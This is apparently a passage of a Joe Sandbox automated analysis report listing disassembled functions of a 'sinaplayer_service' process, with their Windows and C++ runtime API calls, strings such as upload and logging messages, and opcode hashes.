                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V?$basic_streambuf@$?rdbuf@?$basic_ios@?width@ios_base@std@@D@std@@@2@V01@$??6?$basic_ostream@$U?$char_traits@_W@std@@@std@@$CountTick$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@??3@?setstate@?$basic_ios@_?sputc@?$basic_streambuf@?uncaught_exception@std@@D@std@@@1@@Location@tracked_objects@@Message@logging@@Osfx@?$basic_ostream@Time$??2@?flags@ios_base@std@@?sputn@?$basic_streambuf@Base@internal@base@@CallbackCallback@$$Counter@tracked_objects@@CurrentD@2@@std@@@D@std@@DebugDelayedDelta@2@@Delta@base@@FromLevel@logging@@Loop@base@@MessageOutputPostProgramSeconds@SimpleStringTask@ThreadThread@base@@V01@@V12@_V?$allocator@V?$basic_string@Z@2@
                                                                                                                                                                                                    • String ID: StartReport url = $)#sinaclient#[$)- $StartStat url = $UploadMgr::StartStat$stat_thread_$upload_mgr.cpp$Vll
                                                                                                                                                                                                    • API String ID: 2377026256-1840011207
                                                                                                                                                                                                    • Opcode ID: 45ff57e514f34377c06332e0fbab226631097cad2357f161c738b5c0e1d87d4c
                                                                                                                                                                                                    • Instruction ID: 2df0947dac4fab513eb9276b89d87163caf82677e584a82b52416910e6c174c3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 45ff57e514f34377c06332e0fbab226631097cad2357f161c738b5c0e1d87d4c
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7D15C71900219AFDF22DFA4DD4ABDDBBB8FF05304F0044A9E409A7291EB759A48CF51
                                                                                                                                                                                                    Function 6C576B1C Relevance: 59.7, APIs: 27, Strings: 7, Instructions: 192libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,.iWl,00000006,?,?,?,?,?,6C576C5D), ref: 6C576B29
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetThreadGroupAffinity), ref: 6C576B3D
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetThreadGroupAffinity), ref: 6C576B48
                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentProcessorNumberEx,?,?,?,?,?,6C576C5D), ref: 6C576B77
                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 6C576B7E
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6C576C5D), ref: 6C576B9C
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,6C576C5D), ref: 6C5A1FEB
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2007
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2015
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A201B
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2031
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A203F
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2045
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A205B
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A2069
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A206F
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(?,?,?,?,?,?,6C576C5D), ref: 6C5A20B5
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C3
                                                                                                                                                                                                    • GetLastError.KERNEL32(?,6C62CF40,?,?,?,?,?,?,6C576C5D), ref: 6C5A20C9
                                                                                                                                                                                                    • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20DF
                                                                                                                                                                                                    • _CxxThrowException.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20ED
                                                                                                                                                                                                    • ?GetOSVersion@Concurrency@@YA?AW4OSVersion@IResourceManager@1@XZ.MSVCR120(?,6C62CF40,00000000,?,?,?,?,?,6C576C5D), ref: 6C5A20F3
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3900819942.000000006C551000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C550000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3900717819.000000006C550000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901175506.000000006C62F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901245959.000000006C632000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901348341.000000006C635000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901444080.000000006C636000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3901544582.000000006C637000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_6c550000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThrow$AddressProc$HandleModuleVersion@$Concurrency@@Manager@1@Resource
                                                                                                                                                                                                    • String ID: .iWl$GetCurrentProcessorNumberEx$GetThreadGroupAffinity$SetThreadGroupAffinity$]lWl$bad allocation$kernel32.dll
                                                                                                                                                                                                    • API String ID: 2361529535-36948405
                                                                                                                                                                                                    • Opcode ID: c9b3718ebb9c981962999eb6913effa54e94035b0c888b5650e19ca938dd6537
                                                                                                                                                                                                    • Instruction ID: dd63a80e46237fcc0a727f237e4a4537c58892399416a208201db52a27dea1e5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: c9b3718ebb9c981962999eb6913effa54e94035b0c888b5650e19ca938dd6537
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F451B475600215EBD720EFA3CC99AAF77A8BF81304F10091AF549E7E10DB35D909CAB5
                                                                                                                                                                                                    Function 003777F0 Relevance: 58.0, APIs: 29, Strings: 4, Instructions: 235threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037784E
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037786E
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 003778A8
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 003778DF
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 003778FC
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 00377919
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037793C
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037794D
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 00377967
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 00377985
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377994
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003779E2
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 003779EE
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 003779F7
                                                                                                                                                                                                    • ?Stop@Thread@base@@QAEXXZ.BASE ref: 00377A06
                                                                                                                                                                                                    • CoUninitialize.OLE32 ref: 00377A1B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A22
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A39
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A6B
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377A9D
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120 ref: 00377AD1
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 00377AD9
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000001,?,?), ref: 00377B13
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(?), ref: 00377B31
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000001,00000000,00000000), ref: 00377B49
                                                                                                                                                                                                      • Part of subcall function 0037D8F0: ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(?,?,6C6C52C0,00377B60,00000000), ref: 0037D8FA
                                                                                                                                                                                                      • Part of subcall function 0037D8F0: ??1FilePath@base@@QAE@XZ.BASE(?,6C6C52C0,00377B60,00000000), ref: 0037D912
                                                                                                                                                                                                      • Part of subcall function 0037D8F0: ??3@YAXPAX@Z.MSVCR120(00000000,?,6C6C52C0,00377B60,00000000), ref: 0037D921
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE(00000000), ref: 00377B8E
                                                                                                                                                                                                    • ??1FilePath@base@@QAE@XZ.BASE ref: 00377B97
                                                                                                                                                                                                    • ?Release@?$RefCountedThreadSafe@VTaskRunner@base@@UTaskRunnerTraits@2@@base@@QBEXXZ.BASE ref: 00377BA7
                                                                                                                                                                                                    • ??1Thread@base@@UAE@XZ.BASE ref: 00377BB6
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$??3@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@V01@$??6?$basic_ostream@?width@ios_base@std@@FilePath@base@@$?sputc@?$basic_streambuf@TaskThreadThread@base@@U?$char_traits@_Unlock@?$basic_streambuf@W@std@@@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@CountCountedCurrentD@std@@@1@@DebugOsfx@?$basic_ostream@OutputRelease@?$RunnerRunner@base@@Safe@Stop@StringTickTraits@2@@base@@UninitializeV01@@
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $upload_mgr.cpp$~UploadMgr
                                                                                                                                                                                                    • API String ID: 830845522-277928623
                                                                                                                                                                                                    • Opcode ID: 8a98392e80517b4af81da110bc1ce15e570b0720079fcbb38ce4f220012b8354
                                                                                                                                                                                                    • Instruction ID: e28cef5c03727a8745030980a7e2992d89e002764849b6800654d55ae9248a4b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a98392e80517b4af81da110bc1ce15e570b0720079fcbb38ce4f220012b8354
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 74B19471900248DFEF22DFA4D94ABDDBBB4BF15304F0484A9E80D6B292DB755A48CF61
                                                                                                                                                                                                    Function 0037AAC0 Relevance: 56.2, APIs: 27, Strings: 5, Instructions: 230threadwindowCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120(8285FFAB), ref: 0037AB10
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AB33
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AB6D
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037ABB7
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037ABD7
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120(8285FFAB), ref: 00371937
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 0037194E
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QBE_JXZ.MSVCP120 ref: 00371965
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000004,00000000), ref: 00371AC5
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?uncaught_exception@std@@YA_NXZ.MSVCP120 ref: 00371AD2
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP120 ref: 00371ADF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371AEF
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371B03
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037ABF4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?flags@ios_base@std@@QBEHXZ.MSVCP120(?), ref: 003719B4
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 003719DE
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 003719E9
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A08
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAE_JPBD_J@Z.MSVCP120(?,?,00000000), ref: 00371A18
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP120 ref: 00371A41
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHD@Z.MSVCP120(?), ref: 00371A4C
                                                                                                                                                                                                      • Part of subcall function 003718E0: ?width@ios_base@std@@QAE_J_J@Z.MSVCP120(00000000,00000000), ref: 00371A85
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120 ref: 0037AC17
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AC28
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120 ref: 0037AC42
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120 ref: 0037AC4A
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?), ref: 0037AC68
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?), ref: 0037AC77
                                                                                                                                                                                                    • ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ACC8
                                                                                                                                                                                                    • ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ACD4
                                                                                                                                                                                                    • ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 0037ACDD
                                                                                                                                                                                                    • ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AD29
                                                                                                                                                                                                    • ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP120(?,00000000), ref: 0037AD4C
                                                                                                                                                                                                    • ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP120 ref: 0037AD86
                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 0037ADC0
                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 0037ADE0
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,00000000), ref: 0037ADFD
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z.MSVCP120(?,?,?,?,?,?,?,00000000), ref: 0037AE20
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z.MSVCP120(?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE31
                                                                                                                                                                                                    • ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z.MSVCP120(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE4B
                                                                                                                                                                                                    • OutputDebugStringA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE69
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0037AE78
                                                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0037AE92
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: U?$char_traits@$D@std@@@std@@$V01@$??6?$basic_ostream@$V?$basic_streambuf@$?rdbuf@?$basic_ios@D@std@@@2@$?width@ios_base@std@@$??0?$basic_ios@??0?$basic_iostream@??0?$basic_streambuf@??3@?sputc@?$basic_streambuf@CountCurrentD@std@@@1@@DebugOutputStringThreadTickU?$char_traits@_V01@@W@std@@@std@@$??1?$basic_ios@_??1?$basic_iostream@??1?$basic_streambuf@?flags@ios_base@std@@?setstate@?$basic_ios@_?sputn@?$basic_streambuf@?uncaught_exception@std@@MessageOsfx@?$basic_ostream@Post
                                                                                                                                                                                                    • String ID: )#sinaclient#[$)- $SinaPlayerQuit quit sinaplayer_service$SinaPlayerQuit vec_timeout_thread_.size = $upload_mgr.cpp
                                                                                                                                                                                                    • API String ID: 3763361583-1566683569
                                                                                                                                                                                                    • Opcode ID: 39cbeb96bbbb4f41e4ce008e2d6c3202dbc47dd971ad5ae5934396c9561ecbab
                                                                                                                                                                                                    • Instruction ID: a0f7b50512453e7c459c6882cf44c6e406b41ee6f1bd1213c40270a71db5189a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39cbeb96bbbb4f41e4ce008e2d6c3202dbc47dd971ad5ae5934396c9561ecbab
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C3A16272900209EFDF22DFA4DD4ABDDB7B8FB14305F008599E409A7291DB759A44CF61
                                                                                                                                                                                                    Function 00390FF0 Relevance: 51.2, APIs: 23, Strings: 6, Instructions: 457COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00391730: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000,00000000,00000021,00000040,00000001,8285FFAB,?,?,00391DBA), ref: 003917A5
                                                                                                                                                                                                      • Part of subcall function 00391730: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000002), ref: 003917CD
                                                                                                                                                                                                      • Part of subcall function 00391730: ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2@XZ.MSVCP120(?), ref: 003917E0
                                                                                                                                                                                                      • Part of subcall function 00391730: ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@_JH@Z.MSVCP120(00000000,00000000,00000000,?), ref: 00391818
                                                                                                                                                                                                      • Part of subcall function 00391730: ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PAD_J@Z.MSVCP120(00000000,?,?), ref: 00391828
                                                                                                                                                                                                      • Part of subcall function 00391730: ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QAEXH_N@Z.MSVCP120(00000002,00000000), ref: 00391852
                                                                                                                                                                                                      • Part of subcall function 00391730: ??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ.MSVCP120 ref: 00391863
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(?,00000000,00000000,000000FF,00000002,Content-Type: application/octet-stream,00000028,00000000,00000000,000000FF), ref: 00391634
                                                                                                                                                                                                    • ?_Unlock@?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAEXXZ.MSVCP120(00000000,00000000,000000FF,00000002,Content-Type: application/octet-stream,00000028,00000000,00000000,000000FF), ref: 0039166D
                                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCR120(00000000,?,?,?,?,?,?,?,?,?,00000000,00000000,000000FF), ref: 00391679
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000011.00000002.3891378881.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891086039.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3891756895.000000000039D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892029854.00000000003AC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000011.00000002.3892422976.00000000003AD000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_17_2_370000_sinaplayer_service.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: D@std@@@std@@U?$char_traits@$U?$char_traits@_W@std@@@std@@$??3@?seekg@?$basic_istream@?setstate@?$basic_ios@_V12@_$??1?$basic_ios@_?read@?$basic_istream@?tellg@?$basic_istream@H@2@Unlock@?$basic_streambuf@V12@V?$fpos@
                                                                                                                                                                                                    • String ID: "$"$"; filename="$--$Content-Disposition: form-data; name="$Content-Type: application/octet-stream
                                                                                                                                                                                                    • API String ID: 2397676173-1198882228
                                                                                                                                                                                                    • Opcode ID: 347083d9ccf76a23ee342e8d645fafed8889e685a3d561f4211e9873196a0a5d
                                                                                                                                                                                                    • Instruction ID: 8691ea14b68afe2ace1ec2876043813587fe8d798012d0d9e93d10be7a77576f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 347083d9ccf76a23ee342e8d645fafed8889e685a3d561f4211e9873196a0a5d
